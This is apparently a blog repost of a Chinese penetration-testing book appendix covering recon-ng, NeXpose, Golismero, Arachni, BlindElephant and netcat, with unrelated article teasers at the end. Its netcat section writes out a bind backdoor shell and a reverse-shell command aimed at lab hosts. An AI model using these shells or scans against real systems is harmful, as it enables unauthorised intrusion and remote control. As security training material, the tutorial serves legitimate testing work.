辅助工具

本章将会通过以下几个角度,简要介绍几款渗透测试的辅助工具。

● 工具的功能;

● 如果这款工具没有被Kali Linux 收录,本文也会介绍其安装过程;

● 应用案例。

稍后介绍的部分工具确实没有被 Kali Linux 收录。要使用这些软件,就需要修改 Kali Linux的软件仓库配置文件/etc/apt/sources.lst,然后使用apt-get指令进行下载;您还可以从各个工具的官方网站下载这些程序。

我们把这些工具大体分为以下几类:

● 信息侦察工具;

● 漏洞扫描程序;

● Web 应用程序工具。

● 网络工具。

现在,我们就亲密接触这些工具吧!

A.1 侦察工具

recon-ng 是一款帮助我们进行信息侦察的程序。确切的说,它是自动侦察目标、自动识别目标的框架。如果您熟悉Metasploit的框架界面,您可能就会觉得recon-ng的界面很顺手——recon-ng的界面模仿的就是Metasploit的界面。

Kali Linux 已经安装了recon-ng 1.41 版本。喜欢尝试新版本的读者,可以从其官方网站进行更新:https://bitbucket.org/LaNMaSteR53/recon-ng/ overview。

默认安装的 recon-ng 带有信息侦察和目标识别的功能模块。对 1.41 版 recon-ng的功能模块进行分类统计,可得到以下数据。

● Recon modules(侦察模块):65 个。

● Discovery modules(识别模块):7 个。

● Reporting modules(报告模块):4 个。

● Experimental modules(实验性模块):1 个。

如需启动recon-ng程序,可使用下述指令。

recon-ng

运行上述指令之后,您将进入到recon-ng框架的提示符(见图A.1)。大体上看,它的提示信息和Metasploit界面的提示信息十分相似。

figure_0358_0175

图A.1

如需查看recon-ng支持的各种指令,可以在其提示符状态下使用help指令。这个指令的运行结果如图A.2所示。

在这些指令中,最常用的几个指令如下所示。

● use 或load:加载指定模块。

● reload:重新加载所有模块。

● info:显示指定模块的具体信息。

● run:运行指定的模块。

● show:展现recon-ng 框架的各种数据对象。

● back:退出当前提示符的级别。

show modules指令可以列出可供使用的全部模块。这个指令的运行结果如图A.3所示。

figure_0359_0176

图A.2

figure_0359_0177

图A.3

下述指令可通过Bing的搜索引擎,收集指定域名的各主机信息。

recon-ng > load recon/hosts/gather/http/web/bing_site

recon-ng [bing_site] > set domain example.com

DOMAIN => example.com

recon-ng [bing_site] > run

[*] URL: http://www.bing.com/search?first=0&q=site%3A example.com

[*] www.example.com

[*] leb.example.com

[*] sos.example.com

[*] forms.example.com

[*] bankrobbers.example.com

[*] vault.example.com

[*] tips.example.com

[*] delivery.example.com

[*] omaha.example.com

[*] chicago.example.com

[*] foia.example.com

[*] 11 total hosts found.

[*] 11 NEW hosts found!

然后,我们通过show hosts 指令查询前一个指令的搜索结果。

figure_0360_0178

上述例子只是recon-ng 多种功能的一个例子。有关它的各种功能的详细介绍,还请查询作者的官方网站(https://bitbucket.org/LaNMaSteR53/recon-ng/wiki/Home)。

A.2 漏洞扫描程序

Kali Linux 默认安装了OpenVAS。虽然它是一款漏洞扫描程序,但是渗透测试人员不能仅依赖一款工具就确定安全现象。我们应当使用多款工具获取更为全面和详实的信息,充分理解被测信息系统的安全全貌。

本节将要介绍Rapid7 出品的NeXpose 漏洞扫描程序(共享版)。

A.2.1 NeXpose共享版

Rapid7 推出的NeXpose Vulnerability Scanner Community Edition(NeXposeCE)是一款免费的漏洞扫描程序。它可以与Metasploit exploit 框架整合。

NeXpose 共享版具有以下特性:

● 能够扫描最多32 个IP;

● 漏洞数据库可定期升级;

● 可指定风险评估的优先级;

● 可为改进安全性提供指导建议;

● 可与Metasploit 整合;

● 通过网站(http://community.rapid7.com)提供共享版的有关支持;

● 易于部署;

● 可作为免费的初级安全解决方案。

商业版的NeXpose程序具备更多功能。例如,它对扫描的IP数量没有限制,可进行分布式扫描,扫描报告更为灵活,可进行Web和数据库应用程序扫描,并有专门的技术支持服务。

NeXpose由两个部分组成。

● NeXpose扫描引擎:目标识别和检测漏洞的后台程序。共享版程序只有一个引擎,即本地引擎。

● NeXpose安全控制台:安全控制台负责与扫描引擎互动,以启动扫描任务并接收扫描结果。控制台还配有可配置、操作扫描引擎的Web接口。

在初步了解了NeXpose共享版的情况之后,我们接下来安装这个程序。

1.安装NeXpose

在Kali Linux 种安装NeXpose 共享版的具体步骤如下。

1.访问网址 http:∥www.rapid7.com/products/nexpose/nexposecommunity. jsp 并下载安装程序。您首先需要使用工作E-mail 进行注册。此后,网站会把NeXpose CE 许可证密钥和下载指南发送给注册的E-mail 地址。

2.根据E-mail里的信息下载NeXpose共享版的安装程序。本例下载的是适用于64位Linux操作系统的安装程序——NeXposeSetup-Linux64.bin。

3.打开终端程序,进入下载文件所在目录。

4.然后通过下述指令启动NeXpose的安装程序。

./NeXposeSetup-Linux64.bin

屏幕上会显示NeXpose的安装界面,如图A.4所示。

figure_0362_0179

图A.4

5.根据屏幕上的提示进行操作,逐步完成安装过程。请妥善保管在配置过程中设定的用户名和密码。如果您忘记了用户名或密码,就要重新安装NeXpose程序。

2.启动NeXpose

安装完毕之后,您就可以进入程序所在目录启动 NeXpose 程序。默认的安装目录是/opt/rapid7/nexpose。相对应地,您应当通过下述指令进入程序启动脚本所在的目录。

cd /opt/rapid7/nexpose/nsc

然后通过下述脚本程序启动NeXpose。

./nsc.sh

由于NeXpose 需要在启动过程中初始化漏洞信息数据库,所以程序的启动过程可能要花费数分钟的时间。待程序启动完毕,您就可以通过浏览器登录到NeXpose的安全控制台。

如果把NeXpose程序安装为守护进程(daemon),那么启动系统的时候它都会自动启动;另外,用户的注销操作也不会终止守护进程。把它安装为守护进程的具体步骤如下。

1.使用下述指令进入文件nexposeconsole.rc的所在目录。

cd [installation_directory]/nsc

2.打开这个文件,并确定NXP_ROOT变量已经设置为NeXpose的安装目录。

3.把文件nexposeconsole.rc复制到目录/etc/init.d,并将它重命名。本例通过下述指令把它重命名为nexpose。

cp [installation_directory]/nsc/nexposeconsole.rc /etc/init.d/nexpose

4.通过下述指令设置启动脚本的文件权限。

chmod +x /etc/init.d/nexpose

5.并让守护进程伴随系统启动。

update-rc.d nexpose defaults

6.可以通过下述指令控制NeXpose守护进程的启动、终止和重启。

/etc/init.d/nexpose

3.登录NeXpose

如欲登录到NeXpose共享版控制台的Web界面,就得遵循以下操作步骤。

1.打开浏览器并访问 https://127.0.0.1:3780。如果没有出现意外错误,您就会看到程序的登录界面。首次打开这个页面时,浏览器将会提示 Untrusted Connection 信息。您需要验证证书并把这个这个网站和证书设置为永久例外的规则。此后,您就再也不会看到这个警告信息了。

2.在首次访问控制台的时候,控制台将会进行初始设置。它会从Rapid7 的服务器上下载更新安装包。更新程序的过程耗时较长。

3.待程序完成初始化设置,您就可以使用在安装过程中设置好的用户名和密码登录。如图A.5 所示,在输入用户名和密码之后点击Log on按钮。

figure_0364_0180

图A.5

4.控制台将会提示您输入激活信息。如图A.6所示,在窗口的文本框内输入产品许可证密钥之后,点击Activate with key 以完成激活。

figure_0364_0181

图A.6

初次登录到控制台的时候,您会看到NeXpos的新闻页面。这个页面详细列出了NeXpose系统安装了的更新信息和功能改进纪录。如果看得到这个页面,就说明您所用的Kali Linux系统已经成功地安装了NeXpose共享版程序。

KaliLinux自带的Iceweasel浏览器可能无法登录到NeXpose 的安全控制台。如果发生这种情况,您就要安装 Firefox 浏览器。具体安装方法请参见http://kali4hackers.blogspot.com/2013/05/installfirefox-on-kali-linux.html。

4.使用NeXpose

本文将使用NeXpose对局域网进行一次简单的扫描。具体方法如下。

1. 如图A.7所示,在NeXpose的控制面板中点击Home,然后点击New static site in Site Listing以扫描指定网站。

figure_0365_0182

图A.7

2. 此后,依照屏幕上的向导对网站的配置进行设置。此后,在菜单中依次选中 Site configuration | General。然后在这个选项卡中设置网站名称、任务重要程度和任务描述。接下来点击Next按钮,在下一个选项卡中进行设置。

3. 在Assets 选项卡中,指定扫描目标的IP地址。共享版(CE)的NeXpose 最多可扫描32个IP,这个数字也是目标主机数量的上限。然后点击Next按钮,进入下一个选项卡。本例中,我们将使用 NeXpose 扫描运行 Metasploitable 2 的主机,即扫描192.168.56.102。具体设置如图A.8所示。

figure_0366_0183

图A.8

4. 然后您需要在Scan Setup中进行配置。此处,我们选用Full audit的全面扫描模板其他的设置就采取程序的默认设置。然后点击Next按钮,进入下一个选项卡。

5. 设置好选项之后,要点击 Save 按钮,保存各项配置设定。此后,刚才保存的扫描任务就会出现在程序的Site Listing 中。点击scan图标即可手动启动扫描任务。

6. 启动任务之后,界面将会显示Start New Scan 窗口。验证信息的正确性之后,点击Start Now 按钮运行扫描任务。

7. 如图A.9 所示,当NeXpose 完成扫描任务之后,它的控制台会显示扫描结果。

figure_0366_0184

图A.9

8. 图A.10 就是程序目标主机的漏洞报告。

figure_0367_0185

图A.10

9. 如需查看详细的审计报告,可以在顶级菜单里点击 Reports,并运行 Report Generator(报告生成工具)。此次任务的审计报告如图A.11所示。

figure_0367_0186

图A.11

以上就是NeXpose 共享版程序的简要介绍。下一个小节将介绍几款Web应用程序的测试工具。

A.3 Web应用程序测试工具

A.3.1 Golismero

Golismero是一款开源的Web应用程序测试框架,它由Python语言编写。Golismero的主要特征如下所示。

● 它能收集、整理多款著名测试程序(例如sqlmap、xsser、openvas、dnsrecon和theharvester)的扫描结果。

● 它整合了CWE、CVE 和OWASP 的数据库。

Kali Linux安装的Golismero版本过老,不能进行Web应用程序的相关测试。要安装最新版本的Golismero程序,请通过https://github.com/golismero/golismero/archive/master.Zip下载。

然后将之解压缩。接下来,可通过下述指令查看Golismero的帮助信息。

python golismero.py -h

程序显示的帮助信息如图A.12所示。

figure_0368_0187

图A.12

扫描某个网站的指令如下所示。

python golismero.py 192.168.1.138 -o 192-168-1-138.html

扫描结果如图A.13所示。

figure_0369_0188

图A.13

它生成的扫描报告如图A.14所示。

figure_0369_0189

图A.14

A.3.2 Arachni

Arachni(http://www.arachni-scanner.com/)是一款由Ruby语言编写的扫描Web应用程序的工具。它采取模块化设计,性能卓越。

Arachni的功能十分强大(Arachni - Web Application Security Scanner Framework – Ecsypno features),它能够:

● 支持SSL;

● 在审计的过程当中检测到注销状态并能重新登录;

● 高速处理HTTP请求;

● 进行并发扫描;

● 充分利用有限带宽精确识别被测目标的软件平台;

● 排查各种漏洞,可检测SQL 注入漏洞、CSRF、代码注入、LDAP 注入、路径遍历、文件包含和XSS问题。

美中不足的是,Arachni也有很多局限(http://www.arachni-scan ner.com/about/limitations/):

● 它不支持DOM、JavaScript、AJAX 和HTML5;

● 它的报告可能有假阳性的误报。

Kali Linux 默认安装的是0.4.4 版的Arachni 程序。

下述指令将显示帮助信息,并列出Arachni支持的各种指令。

arachni -h

列举所有模块的指令如下所示。

arachni --lsmod

上述指令的运行结果如图A.15所示。

figure_0370_0190

图A.15

出于演示的需要,我们使用 Arachni 扫描一个叫作 DVWA ( http://www. dvwa.co.uk/)的Web应用程序,并把扫描报告保存为HTML文件。假如运行DVWA程序的主机使用的IP是192.168.2.22,那么我们需要使用的指令如下所示。

arachni http://192.168.2.22/dvwa/ --report=html:

outfile=./192-168-2-22-dvwa.html

扫描报告将会保存在目录/usr/share/arachni/bin/中。使用浏览器打开这个报告文件,将会看到如图A.16所示的信息。

figure_0371_0191

图A.16

A.3.3 BlindElephant

BlindElephant是一款可对Web应用程序进行指纹对比的识别程序。这款工具通过扫描某些固定位置的静态文件,把这些文件的哈希值与各版本Web应用程序的那些文件的哈希值进行比对,从而鉴定被测Web应用程序的版本信息。

这种识别技术的鉴定速度快,带宽消耗低,无危害,通用性高且高度自动化。

如需显示BlindElephant的帮助文件,可使用以下指令。

BlindElephant.py -h

上述指令将会在屏幕上显示出程序的帮助信息。

如需了解BlindElephant支持的Web应用程序,或者需要列出它所支持的插件,可使用下述指令。

BlindElephant.py –l

上述指令的运行结果如下(见图A.17)。

figure_0372_0192

图A.17

如欲鉴定目标网站使用的哪个版本的WordPress程序,可使用下述指令。

BlindElephant.py target wordpress

上述指令的输出结果如下。

Hit http://target/readme.html

Possible versions based on result: 3.1.3, 3.1.3-IIS

Hit http://target/wp-includes/js/tinymce/tiny_mce.js

Possible versions based on result: 3.1.1, 3.1.1-IIS, 3.1.1-RC1,

3.1.1-RC1-IIS, 3.1.2, 3.1.2-IIS, 3.1.3, 3.1.3-IIS, 3.1.4, 3.1.4-IIS

...

Possible versions based on result: 3.1, 3.1.1, 3.1.1-IIS, 3.1.1-RC1,

3.1.1-RC1-IIS, 3.1.2, 3.1.2-IIS, 3.1.3, 3.1.3-IIS, 3.1.4, 3.1.4-IIS,

3.1-beta1, 3.1-beta1-IIS, 3.1-beta2, 3.1-beta2-IIS, 3.1-IIS, 3.1-RC1,

3.1-RC2, 3.1-RC2-IIS, 3.1-RC3, 3.1-RC3-IIS, 3.1-RC4, 3.1-RC4-IIS

Fingerprinting resulted in:

3.1.3

3.1.3-IIS

Best Guess: 3.1.3

BlindElephant 对被测的WordPress 程序的鉴定结果是 3.1.3 版程序。依据版本信息,我们可找到相应版本存在的安全漏洞。

A.4 网络工具

本节将要介绍一款多用途的网络工具。有些人把它叫做TCP/IP协议的瑞士军刀,它的名字就是NetCat(http://netcat.sourceforge.net/)。

A.4.1 netcat

netcat是一款借助TCP连接或UDP协议读写数据的工具。默认情况下,它使用TCP协议传递数据。无论是人工输入的指令,还是其他的程序和脚本,都可以调用这款工具传输数据。第11章介绍的ncat程序是netcat的改进版本。您应当注意的是,netcat不会对传输的数据进行加密。

渗透测试人员多数都了解netcat各种不同的用法。这款工具小巧,可移植性高,功能强大,可以在被测主机上单独运行。下面将针对渗透测试工作的需要演示 Netcat 程序的使用技巧。后文的网络配置情况如下。

● SSH Web 服务器的IP 地址是192.168.2.22;

● 客户端的IP 地址是192.168.2.23。

1.打开连接

netcat可以替代telnet的客户端程序,直接连接到指定IP地址的任意端口。这是它的最简单的用法。

例如,可使用下述指令连接到192.168.2.22的22端口(SSH服务)。

nc 192.168.2.22 22

远程服务器的回复信息如下。

SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1

然后,我们使用组合键Ctrl+C关闭连接。

2.提取服务标题

您可以通过前一个例子里用到的技术提取多数网络服务的服务标题(service banner)。不仅SSH服务有标志性的标题,其他的网络服务多数都有相应的服务标题。如果某个端口运行着HTTP服务,那么您需要使用HTTP指令提取标题信息。

例如,我们可使用下述指令提取Web服务软件的版本信息和操作系统信息。

echo -e "HEAD / HTTP/1.0\n\n" | nc 192.168.2.22 80

得到服务器响应如下。

HTTP/1.1 200 OK

Date: Tue, 08 Oct 2013 14:09:14 GMT

Server: Apache/2.2.8 (Ubuntu) DAV/2

X-Powered-By: PHP/5.2.4-2ubuntu5.10

Connection: close

Content-Type: text/html

上述信息表明,Web 服务的后台程序是Apache,主机的操作系统是Ubuntu 5.10。

3.简易聊天服务器

如果要使用netcat程序在1234端口上运行聊天服务器,可使用下述指令。

nc -l -p 1234

此后,您就可以使用telnet、netcat或者相似的软件,连接到服务端程序。

$ telnet 192.168.2.22 1234

随后所输入的所有字符,都将显示在服务端的netcat程序里。

这实际上建立了一种简单的双向通信连接。

如需关闭连接,可使用组合键Ctrl+C。

4.文件传输

如果要传递一个名为thepass的文件,可在接收端运行下述指令。

nc -l -p 1234 > thepass.out

然后在发送端运行下述指令。

nc -w3 192.168.2.22 1234 < thepass

从发送端将会把文件 thepass 传输到接收端。而后,接收端会把文件储存为thepass.out。

我在渗透测试任务中使用netcat传输过文件。当利用了被测主机的漏洞并建立reverse shell之后,用它传递了文件。幸运的是,被测主机装有netcat程序,用它传递文件并没有发生问题。

5.端口扫描

netcat还可以胜任简单的端口扫描工作。本例将使用netcat程序扫描被测主机的TCP 1~1000端口,同时指定程序:显示详细信息(-v)、禁止解析DNS名称(-n)、不发送任何数据(-z)、超时设置为1 秒(-w 1)。综合以上要求,我们需要使用的指令如下所示。

nc -n -v -z -w 1 192.168.2.22 1-1000

上述指令的运行结果如下。

(UNKNOWN) [192.168.2.22] 514 (shell) open

(UNKNOWN) [192.168.2.22] 513 (login) open

(UNKNOWN) [192.168.2.22] 512 (exec) open

(UNKNOWN) [192.168.2.22] 445 (microsoft-ds) open

(UNKNOWN) [192.168.2.22] 139 (netbios-ssn) open

(UNKNOWN) [192.168.2.22] 111 (sunrpc) open

(UNKNOWN) [192.168.2.22] 80 (http) open

(UNKNOWN) [192.168.2.22] 53 (domain) open

(UNKNOWN) [192.168.2.22] 25 (smtp) open

(UNKNOWN) [192.168.2.22] 23 (telnet) open

(UNKNOWN) [192.168.2.22] 22 (ssh) open

(UNKNOWN) [192.168.2.22] 21 (ftp) open

可见,主机192.168.2.22开放了多个端口(514、513、512、445、139、111、80、53、25、23、22、21)。

虽然netcat确实具有端口扫描的功能,但是本书建议您还是使用Nmap进行端口扫描。在这方面,毕竟Nmap的功能更为讲究。

6.backdoor shell

我们同样可以使用netcat程序实现一种可获取shell的后门。这种情况下,要指定程序的监听端口(通过-p选项设置)和shell(通过-e选项设置)。

如果要在1234号端口上打开/bin/sh的shell,可使用下述指令。

nc -e /bin/sh -l -p 1234

此后,我们在客户端上使用telnet或相似的客户端程序连接到服务端后门。

telnet 192.168.2.22 1234

在telnet客户端程序提示相应信息之后,您就可以通过这个shell在服务端的Linux主机上使用任意Linux指令。

例如,我们首先通过id指令获取登录账号的相关资料,可得到如下信息。

uid=1000(msfadmin) gid=1000(msfadmin)

groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video), 46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

接下来,我们通过下述指令查看服务端当前目录的所有文件。

ls -al

上述指令的运行结果如下。

total 9276

drwxr-xr-x 10 msfadmin msfadmin 4096 2013-09-16 18:40 .

drwxr-xr-x 6 root root  4096 2010-04-16 02:16 ..

lrwxrwxrwx 1 root root   9 2012-05-14 00:26 .bash_

history -> /dev/null

drwxr-xr-x 3 msfadmin msfadmin 4096 2013-09-08 03:55 cymothoa

1-beta

-rw-r--r-- 1 msfadmin msfadmin 18177 2013-09-08 03:36 cymothoa

1-beta.tar.gz

drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc

-rw-r--r-- 1 msfadmin msfadmin 1669 2013-08-27 10:11 etc-passwd

-rw-r--r-- 1 msfadmin msfadmin 1255 2013-08-27 10:11 etc-shadow

drwxr-xr-x 5 msfadmin msfadmin 4096 2013-06-12 01:23 .fluxbox

drwx------ 2 msfadmin msfadmin 4096 2013-09-14 08:25 .gconf

drwx------ 2 msfadmin msfadmin 4096 2013-09-14 08:26 .gconfd

-rw------- 1 root root   26 2013-09-14 08:57 .nano_his

tory

-rwxr-xr-x 1 msfadmin msfadmin 474740 2013-09-14 09:38 ncat

drwxr-xr-x 21 msfadmin msfadmin 4096 2013-09-14 09:31 nmap-6.40

-rw-r--r-- 1 msfadmin msfadmin 586 2010-03-16 19:12 .profile

ls 指令的运行结果会回显在客户端的屏幕上。如果在服务端是以 root 权限运行的netcat程序,那么连接到这个后门的客户端用户同样具有服务端主机的全部root权限。不过shell并不是真正的终端,也就是说您无法在shell上运行su之类的指令。

需要注意的是,netcat不会进行加密连接;此外,只要发现了后门的端口,就可连接到相应端口,对服务端主机进行控制。

7.reverse shell

netcat 的reverse shell 工作模式和上一个例子的连接模式恰恰相反。刚才的例子中,我们在服务端开放了一个端口,并把shell 绑定到这个端口。reverse shell 则是让远程主机(shell的服务器端)连接到我们所用的主机(即shell的客户端)。

首先,我们在客户端主机上运行下述指令。

nc -n -v -l -p 1234

然后在服务器端运行下述指令。

nc -e /bin/sh 192.168.2.23 1234

如果客户端主机提示以下信息,则说明我们已经连接到了reverse shell。

connect to [192.168.2.23] from (UNKNOWN) [192.168.2.22] 53529

此后,您可以在客户端主机向服务器端主机发布任意指令。

例如,可在客户端程序里使用下述指令查看远程主机的IP地址。

ip addr show

上述指令的运行结果如下。

1: lo: mtu 16436 qdisc noqueue

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

inet 127.0.0.1/8 scope host lo

inet6 ::1/128 scope host

valid_lft forever preferred_lft forever

2: eth0: mtu 1500 qdisc pfifo_ fast qlen 1000

link/ether 08:00:27:43:15:18 brd ff:ff:ff:ff:ff:ff

inet 192.168.2.22/24 brd 192.168.2.255 scope global eth0

inet6 fe80::a00:27ff:fe43:1518/64 scope link

valid_lft forever preferred_lft forever

在客户端程序里,可执行远程主机支持的所有指令。

A.5 本章小结

本章介绍了数款可能会在渗透测试的工作中使用到的工具。有些软件并没有被 Kali Linux收录,而且Kali收录的软件其版本可能版本不够新。不过,正如我们看到的那样,更新或安装软件的过程并不复杂。本章介绍了4类软件:信息侦察工具、漏洞扫描程序、Web应用程序工具和网络工具。

本文介绍的工具都是广受欢迎的、功能强大且成熟度很高的程序。

本章首先对这些工具进行简要介绍,而后演示了其安装和配置方法,并讲解了它们的各种使用方法。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/276199.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

ApiPost插件⭐️与IDEA的搭配使用,通过引入插件直接在项目里一键开测

小伙伴们大家好&#xff0c;用接口测试工具有一段时间了&#xff0c;最近发现该工具有提供插件直接可以在项目里测试接口&#xff0c;并且页面布局不输应用 目录 一、ApiPost插件介绍 二、安装插件 一、ApiPost插件介绍 Apipost 是一个用于测试和调试 API 接口的 IDEA 插件…

Ubuntu fcitx Install

ubuntu经常出现键盘失灵的问题 查询资料得知应该是Ibus框架的问题 于是需要安装fcitx框架和搜狗拼音 sudo apt update sudo apt install fcitx 设置fcitx开机自启动&#xff08;建议&#xff09; sudo cp /usr/share/applications/fcitx.desktop /etc/xdg/autostart/ 然后…

Github项目推荐:KaTeX

项目地址 GitHub - KaTeX/KaTeX: Fast math typesetting for the web. 项目描述 这是一个渲染公式的JavaScript库。有时候可能网页中需要写一些公式&#xff0c;但html本身并没有提供相应的标签。这个时候这个库就能派上用场了。 项目截图

常见HTTP 500错误发生原因及解决办法剖析

​  对于网站运营者来说&#xff0c;提到500内部服务器错误并不陌生。互联网行业对它的称呼有好几种&#xff0c;如“500内部服务器错误”、“HTTP 500 - 内部服务器错误”、“临时错误 (500)”、“内部服务器错误”。尽管叫法不同&#xff0c;但根本问题是相同的。 目前&…

mac下jd-gui提示没有找到合适的jdk版本

mac下jd-gui提示jdk有问题 背景解决看一下是不是真有问题了方法一&#xff1a;修改启动脚本方法二&#xff1a;设置launchd环境变量 扩展动态切jdk脚本(.bash_profile) 背景 配置了动态jdk后&#xff0c;再次使用JD-GUI提示没有找到合适的jdk版本。 解决 看一下是不是真有问题…

java设计模式学习之【备忘录模式】

文章目录 引言备忘录模式简介定义与用途实现方式 使用场景优势与劣势在Spring框架中的应用备忘录示例代码地址 引言 想象一下&#xff0c;你正在编辑一篇重要的文档&#xff0c;突然你意识到最近的一些更改实际上破坏了文档的结构。幸运的是&#xff0c;你的文本编辑器允许你撤…

Kubernetes快速实战与核心原理剖析

K8S 概览 K8S 是什么 K8S 官网文档&#xff1a;https://kubernetes.io/zh/docs/home/ K8S 是 Kubernetes 的全称&#xff0c;源于希腊语&#xff0c;意为“舵手”或“飞行员”。Kubernetes 是用于自动部署、扩缩和管理容器化应用程序的开源系统。 Kubernetes 源自 Google 15 年…

Ubuntu18.04安装GTSAM库并验证GTSAM是否安装成功(亲测可用)

在SLAM&#xff08;Simultaneous Localization and Mapping&#xff09;和SFM&#xff08;Structure from Motion&#xff09;这些复杂的估计问题中&#xff0c;因子图算法以其高效和灵活性而脱颖而出&#xff0c;成为图模型领域的核心技术。GTSAM&#xff08;Georgia Tech Smo…

【算法刷题】Day26

文章目录 1. 买卖股票的最佳时机含冷冻期题干&#xff1a;算法原理&#xff1a;1. 状态表示&#xff1a;2. 状态转移方程3. 初始化4. 填表顺序5. 返回值 代码&#xff1a; 2. 替换所有的问号题干&#xff1a;算法原理&#xff1a;代码&#xff1a; 1. 买卖股票的最佳时机含冷冻…

从 Linux Crontab 到 K8s CronJob,定时任务正在经历怎样的变革

作者&#xff1a;黄晓萌(学仁) 背景 Job 表示短周期的作业&#xff0c;定时 Job 表示按照预定的时间运行Job&#xff0c;或者按照某一频率周期性的运行 Job。比如&#xff1a; 许多传统企业使用 Linux 自带的 crontab 来做定时任务的方案&#xff0c;该方案非常简单&#xff…

laravel api资源的问题记录

resource 转换层 可以帮助我们转换一些字段的结果&#xff0c;类似前端的filter。 可以使用比如对象或者模型的形式来处理&#xff0c;但使用sql查询会导致n1的问题。如图&#xff1a; 层次嵌套很多&#xff0c;而且很深&#xff0c;这样虽然开发方便了&#xff0c;但是维护就…

Zblog主题模板:ZblogitseanPage博客主题模板

zblog主题模板&#xff1a;ZblogitseanPage博客主题模板 ZblogitseanPage博客主题模板主要是以文字内容为主导&#xff0c;将页面的设计杂乱的图片和元素进行最小化或者去除&#xff0c;从而使整个页面更加简洁、清晰&#xff0c;突出信息的呈现。 下面介绍一下zblog主题模板:Z…

【力扣】20.有效的括号

家人们&#xff0c;看这排序&#xff0c;一看就很简单&#xff0c;对吧&#xff1f;不对&#xff0c;我觉得还挺不是很容易的&#xff0c;哈哈哈。 题解&#xff1a; 在看题目的时候&#xff0c;我一开始的解题思路就挺复杂的。题目说了”左括号必须以正确的顺序闭合“&#x…

如何在简历中解释就业空白

您的工作经历有空缺吗&#xff1f;你不是一个人。有很多合理的理由可以解释为什么你需要休息一下。更重要的是&#xff0c;在一份真实正确的简历中&#xff0c;这些问题是无法避免的。直接解释就业差距总是更好&#xff0c;而且有很多因素需要考虑。你未来的老板想要了解工作轨…

【数据结构二】手撕顺序表与ArrayList源码详解

目录 顺序表与ArrayList 1. 手撕顺序表 2.ArrayList的使用 3.ArrayList的源码分析&#xff08;扩容机制&#xff09; 4.力扣题练习 顺序表与ArrayList 线性表是在逻辑上具备线性结构的一种有序序列&#xff0c;包括顺序表和链表。其中顺序表的物理地址也连续&#xff0c;一…

01_软件测试

01_软件测试 学习目标 1、能复述软件测试的定义 2、能说出7种测试分类的区别 3、能说出质量模型的重点5项 4、能说出测试流程的6个步骤 5、能说出测试模板8个要素 认识软件及测试 什么是软件 软件&#xff1a;控制计算机硬件工作的工具 软件的基本组成 软件生产过程 什么是软…

打地鼠游戏来了

主要利用js鼠标点击事件和window.setInterval&#xff08;&#xff09;回调函数来进行实现的. 源码获取方式&#xff1a;链接&#xff1a;https://pan.baidu.com/s/1eW9qvX3zFH9qlH82-I4yOA 提取码&#xff1a;1233

配置代理解决跨域(CORS)问题

一、跨域 &#xff1f; 我们在完成前后端分离项目时&#xff08;VueSpringBoot&#xff09;&#xff0c;有很多人会遇到跨域问题&#xff08;CORS&#xff09;。 跨域&#xff08;Cross-Origin Resource Sharing&#xff0c;CORS&#xff09;是浏览器的一项安全功能&#xff…

Illustrator脚本 #015 自动角线

这是一个在画板上自动生成辅助线和角线的脚本,只要单击最右边按钮运行脚本即可。 绿色的为参考线及出血线。 #target "Illustrator" var settings = {addTrim : true,addBleedGuide : true,addCenterGuide : true,addCover : false,overlapAlert : false,trimma…

《数据库开发实践》之触发器

一、什么是触发器&#xff1f; 1.概念&#xff1a; 简单来说触发器就是一种特殊的存储过程&#xff0c;在数据库服务器触发事件的时候会自动执行其SQL语句集。 2.构成四要素&#xff1a; &#xff08;1&#xff09;名称&#xff1a;要符合标识符命名规则 &#xff08;2&am…